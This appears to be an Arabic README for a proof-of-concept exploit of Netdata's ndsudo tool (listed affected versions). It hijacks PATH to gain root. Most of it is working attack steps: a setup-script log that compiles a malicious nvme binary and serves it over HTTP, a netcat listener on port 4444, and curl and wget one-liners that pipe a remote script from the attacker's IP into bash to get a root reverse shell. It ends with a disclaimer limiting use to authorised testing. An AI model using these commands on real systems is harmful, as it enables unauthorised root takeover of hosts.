
نص برمجي باش لرفع الامتيازات عبر "ndsudo" (استغلال Netdata المحلي)
نص Bash لرفع الامتيازات عبر "ndsudo" (استغلال Netdata محلي)
>= v1.45.0, < v1.45.3
>= v1.44.0-60, < v1.45.0-169
أداة "ndsudo" تشغل مجموعة محدودة من الأوامر الخارجية، ولكن مسارات البحث يتم توفيرها بواسطة متغيرات البيئة "PATH".
بتغيير متغير البيئة "PATH" إلى مسار يمكننا الوصول إليه، يمكننا التحكم في المكان الذي يبحث فيه ndsudo عن الأوامر وإنشاء أمر يحتوي على كود خبيث.
يقوم هذا الاستغلال على افتراض أن الجهاز المستهدف وجهاز المهاجم موجودان على نفس الشبكة.
يمكننا إنشاء ونشر الملفات اللازمة للهجوم تلقائيًا عن طريق تشغيل "setup_exploit_server.sh"
$ ./setup_exploit_server.sh YOUR_IP
--------- Exploit Infrastructure Setup by Ottanta ---------
[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444
Press Enter to stop the web server and clean up...
سيقوم هذا البرنامج النصي بإنشاء جميع الملفات اللازمة للهجوم مهيأة بعنوان IP الخاص بك.
بعد نشر خادم الويب الخاص بنا، نبدأ مستمعًا على صدفة أخرى:
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...
اعتمادًا على عميل HTTP الخاص بنا، يمكننا تحميل وتنفيذ استغلالنا.
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
إذا تم كل شيء بشكل صحيح، يجب أن نحصل الآن على صدفة الجذر.

إثبات المفهوم هذا مخصص للأغراض التعليمية والاختبار المصرح به فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها يعتبر غير قانوني.
المؤلفون غير مسؤولين عن أي إساءة استخدام لهذه المعلومات.